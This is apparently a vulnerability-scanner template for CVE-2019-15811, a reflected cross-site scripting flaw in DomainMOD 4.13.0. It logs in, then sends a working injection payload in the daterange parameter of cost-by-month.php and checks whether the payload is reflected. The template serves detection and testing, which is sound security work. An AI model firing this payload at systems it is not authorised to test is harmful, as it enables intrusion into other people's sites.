id: CVE-2019-15811 info: name: DomainMOD 4.13.0 - Cross-Site Scripting author: arafatansari severity: medium description: | DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters. reference: - https://www.exploit-db.com/exploits/47325 - https://github.com/domainmod/domainmod/issues/108 - https://zerodays.lol/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2019-15811 cwe-id: CWE-79 metadata: verified: "true" tags: cve,cve2019,domainmod,xss,authenticated requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded new_username={{username}}&new_password={{password}} - | GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 Host: {{Hostname}} cookie-reuse: true redirects: true max-redirects: 2 req-condition: true matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(all_headers_2, "text/html")' - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - 'contains(body_2, "DomainMOD")' condition: and